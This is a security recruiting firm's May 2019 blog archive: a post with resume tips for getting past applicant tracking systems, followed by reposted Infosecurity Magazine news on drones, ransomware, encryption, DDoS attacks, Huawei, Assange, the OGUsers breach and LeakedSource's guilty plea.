Intelligent Connections. Recruiting Integrity.
Call Us: 415-510-2973

Archive for May 2019

Hacking the Applicant Tracking System: Resume Tips to Get Your Resume Found

Follow these 5 Applicant Tracking System resume tips to make sure your InfoSec resume doesn’t automatically get kicked out of the screening process

Dear ‘FirstName’ Unknown ‘LastName’ Unknown,

I am a recruiter – today I spent hours sourcing from one of the many career websites/resume databases that you carefully created a profile and uploaded your resume. I read the profiles and created the perfect candidate pool of job seekers that I wanted to target. I downloaded the resumes from the resume database and for HR compliance I uploaded them to my Applicant Tracking System (ATS). To my dismay, this step usually results in 50% of the resumes being unreadable and you my favorite candidate is now “Unknown Unknown”. I researched what was happening and found one common thread among these sourced candidates. The top of their resumes stated:

– Note: This is a converted Word document. An image of the resume is displayed rather than text.

Keep in mind ATS systems are now used by most companies to meet HR compliance and handle the 100’s of applicants they receive on most job postings. Recruiters generally upload their sourced resumes to these systems to meet HR compliance requirements. ATS systems parse resumes and compare the data against criteria in the job posting through key words, screening questions, etc. Most resumes are only seen by humans if they are actually sourced or if they pass the initial screenings completed solely by the computer.

Unfortunately, if you are one of the InfoSec folks who have converted your resume to the Word image format, it will be lost once the recruiter uploads it to the ATS or it will not succeed in passing most ATS initial screenings. Usually this means you will receive a rejection letter automatically from the system once they make their final selection. So here’s what happens – most resume parsers in ATS systems do not have optical character recognition (OCR) capabilities, therefore your resume image is simple unreadable by the computer systems.

InfoSec Connect wants to help you modify your resume to ensure you are being considered based on your skill set and not your resume format. Algorithms designed to screen resumes are systematic and minor things can kick your resume out of consideration. The rules are simple:

  • DO NOT convert your resume to an image
  • DO NOT put your name and contact information in the document header
  • DO keep your resume format simple – try to avoid advanced formatting such as tables, unique fonts, images, etc.
  • DO Clearly label the resume sections with standardized headings (best to use headings from postings such as Qualifications, Experience etc.)
  • DO use the keywords that you identified in the job posting – keep in mind that most ATS systems use outdated SEO methods for the initial screening.

Now go update that resume and get past those initial screenings!

DHS Issues Alert on Chinese-Made Drones

DHS Issues Alert on Chinese-Made Drones

Chinese-made drones may be sending sensitive flight data to their manufacturers in China, according an alert issued by the US Department of Homeland Security (DHS), CNN reported on May 20.

In a copy of the alert obtained by CNN, DHS said, "The United States government has strong concerns about any technology product that takes American data into the territory of an authoritarian state that permits its intelligence services to have unfettered access to that data or otherwise abuses that access.”

While the report refrains from naming specific manufacturers, approximately 80% of the drones used in the US and Canada reportedly come from DJI in Shenzhen, China. DHS reportedly is concerned about "potential risk to an organization's information…[from products that] contain components that can compromise your data and share your information on a server accessed beyond the company itself," according to CNN.

"Those concerns apply with equal force to certain Chinese-made (unmanned aircraft systems)-connected devices capable of collecting and transferring potentially revealing data about their operations and the individuals and entities operating them, as China imposes unusually stringent obligations on its citizens to support national intelligence activities," the alert reportedly added.

“The Department of Commerce required Google to pull rights to use Google Play and apps on Android from Huawei. Now, we are hearing about risks of Chinese-made drones, which the primary manufacturer is DJI based in China,” said Chris Morales, head of security analytics at Vectra.

“The overall theme is that a third-party manufacturer could be using personal data for malicious intent. This is a theme that should expand beyond just a specific nation state actor. This is a real concern for any device that is collecting data on a user, regardless of where they are based.

“It doesn’t mean everyone is bad, though. Most organizations are in the business of making money and are not intentionally causing harm to consumers. Personally, I don’t even like enabling features, such as location services, on my personal device that gives even American companies too much data about me and my own personal habits.”

Source: Information Security Magazine

Ransomware Not Gone but More Targeted, Report Says

Ransomware Not Gone but More Targeted, Report Says

Cyber-criminals continue to grow more sophisticated, developing advanced attack methods, including tailored ransomware, according to the Q1 Global Threat Landscape Report, published today by Fortinet. In addition to targeted attacks, criminals are also using custom coding, living-off-the-land (LotL) and sharing infrastructure to maximize their opportunities, the report said.

Despite a decline in previous high rates of ransomware, ransomware itself is far from gone. Instead, cyber-criminals are using more targeted attacks. Ransomware “is being customized for high-value targets and to give the attacker privileged access to the network. LockerGoga is an example of a targeted ransomware conducted in a multi-stage attack. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed,” the report said.

Researchers also detected an uptick in malicious actors leveraging dual-use tools, preinstalled on targeted systems to carry out cyber-attacks. 

The report noted the trend of shared infrastructure. Researchers detected a rise in the total malware and botnet communication activity, as well as the number of domains shared between threats at each stage of the kill chain.

“Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. IcedID is an example of this 'why buy or build when you can borrow' behavior. In addition, when threats share infrastructure they tend to do so within the same stage in the kill chain. It is unusual for a threat to leverage a domain for exploitation and then later leverage it for C2 traffic. This suggests infrastructure plays a particular role or function when used for malicious campaigns,” the report said.

“We, unfortunately, continue to see the cyber-criminal community mirror the strategies and methodologies of nation-state actors, and the evolving devices and networks they are targeting,” said Phil Quade, chief information security officer, Fortinet, in a press release.

“Organizations need to rethink their strategy to better future-proof and manage cyber risks. An important first step involves treating cybersecurity more like a science – doing the fundamentals really well – which requires leveraging the cyberspace fundamentals of speed and connectivity for defense. Embracing a fabric approach to security, micro and macro segmentation and leveraging machine learning and automation as the building blocks of AI can provide tremendous opportunity to force our adversaries back to square one.”

Source: Information Security Magazine

Encryption is Often Poorly Deployed, if Deployed at All

Encryption is Often Poorly Deployed, if Deployed at All

Encryption continues to be a challenge for companies, as only a quarter of organizations admit to using it for at-rest data, and for emails and data centers.

According to research by Thales and IDC, encryption for email is only adopted by around 27% of European of the respondents they recently surveyed, while the numbers decline for data at rest, data centers, Big Data environments and full disk encryption. The only instance of European respondents ranking higher than a global number was in the instance of using cloud-native provider encryption.

Speaking at an event in London, Thales senior regional sales director, Kai Zobel, said that despite the introduction of GDPR a year ago “companies struggle to understand where the data is” and he has seen some companies buy a product to “encrypt some islands but then they struggle to continue. So we see thousands of potential servers that need to be encrypted but they [some companies] just do 200 and they think they are done.”

Zobel added that with more and more politics in the workplace, data “doesn’t want to be touched” and there is a feeling that security cannot be relied upon.

“They [organizations] have long lists of what to implement in the next 12 months, but they struggle to implement it and one of the main reasons is because of complexity,” Zobel said. “This is because they don’t have enough people to understand the technology in the best way possible.”

He also commented that a number of companies look for “good enough compliance” and people would rather spend less than ensure 100% security, “so they are just trying to find good solutions but not 'The Best' solution.”

Jason Hart, security evangelist at Thales, said that there is a wider problem of nothing changing in the last 25 years, except that we are creating more and more data. That has become a commodity, and “because of the acceleration of cloud I say to a company ‘what are you trying to protect?’ and after an hour we may get to a conversation about data and two hours later we may get to the type of data that they deem to be valuable.”

However, Hart argued that companies do not understand the risks that they are trying to mitigate, “and information security is really simple, it is about people, data and process.”

Speaking to Infosecurity, Hart said that if you look at every major breach that has occurred, there are too many instances of companies not deploying encryption properly, and also people do not look at the risk.

“You encrypted the data in the database, but what talks to the database? The application, so the data now transverses into the application’s code text and then from the application it goes into the cloud,” he said. “So they do it in silos and elements, but when people do it wrong, there is a false sense of security.” 

Source: Information Security Magazine

DDoS Attacks on the Rise After Long Period of Decline

DDoS Attacks on the Rise After Long Period of Decline

The number of DDoS attacks increased by 84% in the first quarter of 2019 compared to Q4 2018, according to new research from Kaspersky Lab.

The global cybersecurity company’s findings, detailed in its DDoS Attacks in Q1 2019 report, come in the wake of dramatically falling numbers of DDoS attacks recorded throughout 2018, suggesting that cyber-criminals are once again turning to DDoS as an attack method after a sustained period of shifting their attention to other sources of income last year, such as cryptomining.

What’s more, Kaspersky Lab discovered a substantial growth in the amount of attacks that lasted more than an hour. The company suggested that the launch of newer DDoS-for-Hire services could explain the sudden rise in the number of DDoS attacks in 2019.

“The DDoS attack market is changing,” said Alexey Kiselev, business development manager on the Kaspersky DDoS Protection team. “New DDoS services appear to have replaced ones shut down by law enforcement agencies. As organizations implement basic countermeasures, attackers target them with long-lasting attacks. It is difficult to say if the number of attacks will continue to grow, but their complexity is showing no signs of slowing down.

“We recommend that organizations prepare themselves effectively, in order to withstand sophisticated DDoS attacks.”

Kaspersky Labs’ advice for DDoS attack defense included:

•           Ensuring that web and IT resources can handle high traffic

•           Using professional solutions to protect the organization against attacks

Source: Information Security Magazine

Washington Issues Temporary License to Huawei

Washington Issues Temporary License to Huawei

The US government has issued a temporary license to Huawei and its affiliates, allowing American companies to supply the telecoms and handset giant until August.

Despite reports emerging over the weekend of various chipmakers halting supplies to the Chinese firm after it was placed on an Entity List last week, the Commerce Department appears to have softened its stance.

Issued on Monday, the temporary general license for Huawei and 68 non-US affiliates will run for 90 days, bringing it up to August 19 2019.

It covers various areas, including: supplies to ensure Huawei’s networks and equipment are fully operational; software updates for existing Huawei handsets; and disclosure of any security vulnerabilities to the firm.

The license also authorizes US firms to engage with Huawei and its affiliates “as necessary for the development of 5G standards as part of a duly recognized international standards body.”

At the same time, Huawei founder Ren Zhengfei has struck a defiant tone in state media reports, claiming the US “underestimates” the firm’s capabilities and that it has already made efforts to mitigate the impact of any supply chain restrictions.

He has also reportedly claimed that no company can catch Huawei in terms of its 5G technology, a fact that Western lawmakers are grappling with in weighing up how to treat the company.

Lock the company out of 5G completely and it could add years to implementation, impacting customers — or at least, that’s Huawei's argument.

Although UK Prime Minister Theresa May agreed only to allow Huawei to supply non-core parts of carriers’ 5G networks, the decision by the leading Five Eyes nation remains controversial.

A new report by right-wing think tank the Henry Jackson Society co-authored by a Conservative MP and a former government security advisor claims there is “significant risk” in allowing Huawei to supply the UK’s 5G networks.

The report includes a foreword from former MI6 boss, Richard Dearlove, calling on the government to reconsider its position.

Source: Information Security Magazine

Ecuador Shares Assange's Legal Docs with US

Ecuador Shares Assange's Legal Docs with US

Complying with a request by US authorities, Ecuadorian officials are preparing to hand over documents that are reportedly the entire legal defense against Julian Assange, compiled during the time he has been living in the Ecuadorian embassy in London, according to WikiLeaks.

"On Monday Ecuador will perform a puppet show at the embassy of Ecuador in London for their masters in Washington, just in time to expand their extradition case before the UK deadline on 14 June," WikiLeaks editor-in-chief Kristinn Hrafnsson said. "The Trump administration is inducing its allies to behave like it's the Wild West."

Assange’s lawyers are reportedly not permitted to be present during what is being called the “illegal seizure of his property.”

“The material includes two of his manuscripts, as well as his legal papers, medical records and electronic equipment. The seizure of his belongings violates laws that protect medical and legal confidentiality and press protections,” WikiLeaks said.

Ecuador officials also refused a request by UN special rapporteur on privacy, who requested permission to monitor Ecuador's seizure of Assange's property.

The US had previously asked Ecuador to share audiovisual material and additional documents, which had reportedly been collected during an internal spying operation against Assange, WikiLeaks said.

"It is extremely worrying that Ecuador has proceeded with the search and seizure of property, documents, information and other material belonging to the defense of Julian Assange, which Ecuador arbitrarily confiscated, so that these can be handed over to the agent of political persecution against him, the United States. It is an unprecedented attack on the rights of the defence, freedom of expression and access to information exposing massive human rights abuses and corruption. We call on international protection institutions to intervene to put a stop to this persecution," said Baltasar Garzón, international legal coordinator for the defense of Assange and WikiLeaks.

Though Ecuador is obviously not a part of the EU, "if arguing that because Assange is an EU resident and therefore subject to the protections of GDPR, Article 23 makes a pretty strong case that those protections become restricted if revealing that data was a matter of national defense or if some other form of legal matter, either criminal or civil, is involved,” said Nathan Wenzler, senior director of cybersecurity at Moss Adams.

“While I’m not a lawyer, it seems likely that all nations involved would have a good chance of demonstrating some sort of legal action involved here and thus, make this action a non-event under the provisions of GDPR. Morally, there’s a whole other argument here that could (and should, in my opinion) be had. However, I’m not sure there’s much that can or will be done under GDPR in this case.”

Source: Information Security Magazine

New South Wales Announces New Cybersecurity Position

New South Wales Announces New Cybersecurity Position

In an attempt to centralize all of the cyber efforts and strategies of the state, New South Whales (NSW) has announced a new cybersecurity NSW office to be led by led by Tony Chapman, chief cybersecurity officer, according to a May 20 press release.

Chapman assumed the position today, which falls under the department of customer service, and wrote via LinkedIn, “The changes reflect the leadership and coordination role required to uplift cyber security and decision-making across NSW Government.

I am performing the functions previously undertaken by the NSW Government Chief Information Security Officer (GCISO), established in March 2017, with a renewed focus on securing digital transformation and the continual improvement of customer service outcomes.”

To enable digital transformation, a part of the overall vision of the new customer service cluster, the office will focus on improving cybersecurity capabilities and standards to include a coordinated cyber-incident response plan and develop strategic cyber-policy positions through a revitalized cybersecurity senior officers’ group (CSSOG), according to Chapman.

To see the vision of the new customer service cluster to its fruition, Chapman said he will work to strengthen ties across NSW's government, other states' governments and the federal government to establish cybersecurity best practices that will yield better results for citizens.

“A key component of the role will be driving a culture of risk management and awareness to support greater resilience to cyber security threats. Tony and his team will build on the digital transformation work occurring across the NSW government, ensuring our digital spaces are safeguarded against cyber threats,” said the state government's chief information and digital officer, Greg Wells, in the press release.

“Cybersecurity NSW will continue its critical work enhancing whole-of-government cyber security capabilities and standards on behalf of NSW. It will also work more closely with the information and privacy commission on security, privacy and the availability of systems and services during the State’s digital transformation.”

Source: Information Security Magazine

Online Account Hijacker Forum OGUsers Hacked

Online Account Hijacker Forum OGUsers Hacked

An online forum used by those involved in online account hijacking has been breached, according to KrebsonSecurity.

An attack on OGUsers.com leaked the personal information of nearly 113,000 people. Krebs reportedly received a copy of the database, which included usernames, email addresses, hashed passwords, private messages and IP address.

The RaidForums Omnipotent administrator announced to forum members that he had made the OGUsers forum database for available for download, writing:

Hello RaidForums Community,

Today I have uploaded the OGUsers Forum Database for you to download for free, thanks for reading and enjoy!

On the 12th of May 2019 the forum ogusers.com was breached 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I'm the first to tell you the truth view his statement here or if you don't want to visit their website view it here. According to his statement he didn't have any recent backups so I guess I will provide one on this thread lmfao.

Compromised data: Website activity, Usernames, Emails, IP Addresses, Passwords (Salted MD5), Source code, Website data, User private messages.

While users on the OGUsers.com forum expressed concern about their identities being revealed as a result of the hack, Krebs said, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”

Source: Information Security Magazine

LeakedSource Company Pleads Guilty

LeakedSource Company Pleads Guilty

The operators of an infamous breached credentials site have pleaded guilty to trading in stolen information, according to Canadian police.

Defiant Tech, which owns the LeakedSource website, entered the plea on Friday at a court in Ottowa, a brief notice from the Royal Canadian Mounted Police (RCMP) stated.

The charges of “trafficking in identity information and possession of property obtained by crime” came after an investigation was launched by the police in 2016, when the RCMP found that servers hosting LeakedSource were located in Quebec.

Project “Adoration,” as it was known, saw the RCMP’s newly formed National Division Cybercrime Investigative Team receive assistance from the Dutch National Police and the FBI.

In December 2017, Jordan Evan Bloom, 27, from Thornhill, Ontario, was arrested on suspicion of making an estimated C$247,000 ($200,000) from the business.

The now-defunct site had a database of around three billion passwords and identity records, which users could access via simple search functionality for a fee. This information is said to have been purchased from hackers and lifted from the public domain. Data was taken from big-name companies like LinkedIn and MySpace.

"We are pleased with this latest development,” said superintendent Mike Maclean, officer in charge of criminal operations for RCMP National Division.

“This is all thanks to the relentless efforts put by our men and women working in the National Division Cybercrime Investigative Team. I am immensely proud of this outcome as combating cybercrime is an operational priority for us."

A second man is suspected to have conspired with Bloom, but charges have so far not been brought.

Source: Information Security Magazine